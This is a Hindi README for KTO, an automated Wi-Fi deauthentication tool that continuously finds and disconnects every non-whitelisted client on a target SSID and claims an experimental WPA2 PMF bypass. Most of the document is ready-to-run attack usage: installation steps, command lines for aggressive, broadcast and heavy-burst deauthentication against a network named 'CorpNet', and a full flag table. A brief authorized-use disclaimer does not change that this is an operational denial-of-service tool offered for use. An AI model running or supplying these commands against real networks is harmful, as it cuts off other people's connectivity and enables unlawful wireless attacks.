
स्वचालित Wi-Fi डीऑथेंटिकेशन टूल जो लगातार लक्ष्य SSID पर क्लाइंट्स को स्कैन करता है और गैर-श्वेतसूचीबद्ध उपकरणों को बाहर करता है। इसमें श्वेतसूची समर्थन, मेश/मल्टी-AP हैंडलिंग, PMF डिटेक्शन, और EAPOL निकासी के माध्यम से प्रायोगिक WPA2 PMF बाईपास शामिल है।
इसे किसी SSID पर लक्षित करें और यह स्वचालित रूप से हर जुड़े क्लाइंट को खोजता है और उन्हें बाहर निकालता है --- जिनमें पुनः कनेक्ट करने का प्रयास करने वाले भी शामिल हैं --- बिना किसी मैन्युअल लक्ष्यीकरण की आवश्यकता के।
aireplay-ng जैसे उपकरण आपको BSSID और क्लाइंट MAC प्रदान करने के लिए कहते हैं। आपको पहले यह जानना होगा कि नेटवर्क पर कौन है, और यदि कोई पुनः कनेक्ट होता है तो आपको उन्हें स्वयं पकड़ना होगा और इसे फिर से चलाना होगा। KTO यह सब एक लूप में स्वचालित रूप से करता है: निरंतर स्कैन → लाइव क्लाइंट सूची → ऑटो डीऑथ → दोहराएँ। पुनः कनेक्ट होने वाला कोई भी व्यक्ति अगले स्वीप पर पकड़ा जाता है।
केवल अधिकृत उपयोग। इसे केवल उन नेटवर्कों पर चलाएँ जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति है। अनधिकृत डीऑथेंटिकेशन अधिकांश न्यायक्षेत्रों में अवैध है।
--live-table स्क्रॉलिंग लॉग के बजाय एक ताज़ा क्लाइंट तालिका दिखाता है, डेमो के लिए अच्छा है--log FILE टाइमस्टैम्प के साथ प्रत्येक किक को सहेजता है, सत्रों में जोड़ता है--scan-only बिना कोई फ्रेम भेजे क्लाइंट की खोज और लॉग करता है# Python 3.10+
pip install scapy
# aircrack-ng suite
sudo apt install aircrack-ng
रूट के रूप में चलाया जाना चाहिए।
git clone https://github.com/Ymsniper/KTO.git
cd KTO
pip install scapy
कोई अन्य सेटअप आवश्यक नहीं है। एकल स्क्रिप्ट, कोई कॉन्फ़िग फ़ाइल नहीं।
sudo python3 kto.py -i <interface> -t <SSID> [options]
इंटरफ़ेस मॉनिटर मोड में होना चाहिए, या KTO को इसे संभालने देने के लिए --auto-monitor पास करें।
# मूल
sudo python3 kto.py -i wlan0mon -t "CorpNet"
# KTO को मॉनिटर मोड संभालने दें
sudo python3 kto.py -i wlan0 -t "CorpNet" --auto-monitor
# आक्रामक मोड — कोई पुनः कनेक्ट विंडो नहीं
sudo python3 kto.py -i wlan0mon -t "CorpNet" --aggressive
# अपने स्वयं के उपकरण को बख्शें
sudo python3 kto.py -i wlan0mon -t "CorpNet" -w AA:BB:CC:DD:EE:FF
# केवल निष्क्रिय खोज, कोई डीऑथ नहीं
sudo python3 kto.py -i wlan0mon -t "CorpNet" --scan-only
# मेश या बहु-AP नेटवर्क
sudo python3 kto.py -i wlan0mon -t "CorpNet" --auto-bssid
# एक लॉग सहेजें और लाइव तालिका दिखाएं
sudo python3 kto.py -i wlan0mon -t "CorpNet" --log session.txt --live-table
# aireplay-ng के साथ भारी बर्स्ट
sudo python3 kto.py -i wlan0mon -t "CorpNet" -n 10 --aireplay --broadcast
# PMF बाईपास अक्षम करें (WPA2+PMF पर मानक डीऑथ पर वापस जाएं)
sudo python3 kto.py -i wlan0mon -t "CorpNet" --no-bypass
# मेरा फ़ोन
AA:BB:CC:DD:EE:FF
# लैपटॉप
11:22:33:44:55:66
v2.1.6 से शुरू करते हुए, KTO में Protected Management Frames (PMF) सक्षम WPA2-PSK नेटवर्क के लिए एक प्रायोगिक PMF सुविधा शामिल है। जब WPA2 नेटवर्क पर PMF का पता लगाया जाता है, KTO स्वचालित रूप से गलत-पासवर्ड EAPOL निष्कर्षण का प्रयास करता है:
इस बाईपास को वास्तविक नेटवर्क पासवर्ड की आवश्यकता नहीं है --- इसे केवल SSID की आवश्यकता है।
महत्वपूर्ण सीमाएँ:
यदि आप बाईपास को पूरी तरह से छोड़ना चाहते हैं और केवल मानक डीऑथ फ्रेम भेजना चाहते हैं (यह स्वीकार करते हुए कि PMF-सक्षम क्लाइंट उन्हें छोड़ देंगे), तो --no-bypass फ़्लैग का उपयोग करें।
यदि लक्ष्य AP में Protected Management Frames सक्षम हैं, तो KTO स्टार्टअप पर आपको चेतावनी देगा। 802.11w समर्थन वाले क्लाइंट चुपचाप असुरक्षित डीऑथ फ्रेम को छोड़ देंगे, इसलिए प्रभावशीलता इस बात पर निर्भर करती है कि कौन से उपकरण जुड़े हुए हैं।
हालांकि, आक्रामक मोड में पर्याप्त उच्च डीऑथ बर्स्ट के साथ, KTO को कुछ नेटवर्कों पर PMF-सुरक्षित क्लाइंट को अभी भी डिस्कनेक्ट करते देखा गया है --- बाईपास के बिना भी। फ्रेम की भारी मात्रा कुछ कार्यान्वयनों को अभिभूत करती प्रतीत होती है। तो जबकि PMF एक महत्वपूर्ण बचाव है, यह हर सेटअप में अभेद्य नहीं है।
Ctrl+C सब कुछ साफ-साफ रोकता है, यदि KTO ने मॉनिटर इंटरफ़ेस बनाया है तो इंटरफ़ेस को प्रबंधित मोड में पुनर्स्थापित करता है, और प्रति क्लाइंट बर्स्ट गणना के साथ एक सत्र सारांश प्रिंट करता है।
MIT लाइसेंस --- देखें LICENSE
| फ़्लैग | डिफ़ॉल्ट | विवरण |
|---|
-i, --interface | आवश्यक | वायरलेस इंटरफ़ेस (जैसे wlan0mon) |
-t, --target | आवश्यक | लक्ष्य SSID नाम |
-w, --whitelist | --- | बख्शने के लिए अल्पविराम से अलग किए गए MAC |
--whitelist-file FILE | --- | बख्शने के लिए MAC की फ़ाइल, प्रति पंक्ति एक (# = टिप्पणी) |
-c, --channel | ऑटो | किसी विशिष्ट चैनल पर लॉक करें |
-n, --count | 5 | प्रति बर्स्ट प्रति दिशा डीऑथ फ्रेम |
-s, --sleep | 5.0 | स्वीप के बीच सेकंड |
--scan-duration | 8.0 | प्रति स्वीप airodump-ng द्वारा सुनने के सेकंड |
--delay | 0.1 | आक्रामक लूप में प्रति-क्लाइंट विलंब |
--broadcast | बंद | ff:ff:ff:ff:ff:ff को भी डीऑथ करें |
--aireplay | बंद | Scapy के बजाय aireplay-ng का उपयोग करें |
--aggressive | बंद | समानांतर स्कैन + डीऑथ थ्रेड |
--scan-only | बंद | निष्क्रिय मोड, कोई फ्रेम नहीं भेजा गया |
--auto-monitor | बंद | airmon-ng के माध्यम से स्वचालित रूप से मॉनिटर मोड सक्षम करें |
--auto-bssid | बंद | मेश / बहु-AP SSIDs के लिए स्वचालित रूप से सबसे मजबूत BSSID चुनें |
--reason | 7 | 802.11 कारण कोड (1=अनिर्दिष्ट, 4=निष्क्रियता, 7=क्लास3-फ्रेम) |
--log FILE | --- | टाइमस्टैम्प्ड किक लॉग को फ़ाइल में सहेजें |
--live-table | बंद | स्क्रॉलिंग आउटपुट के बजाय ताज़ा क्लाइंट तालिका |
--no-bypass, -nb | बंद | प्रायोगिक PMF बाईपास अक्षम करें |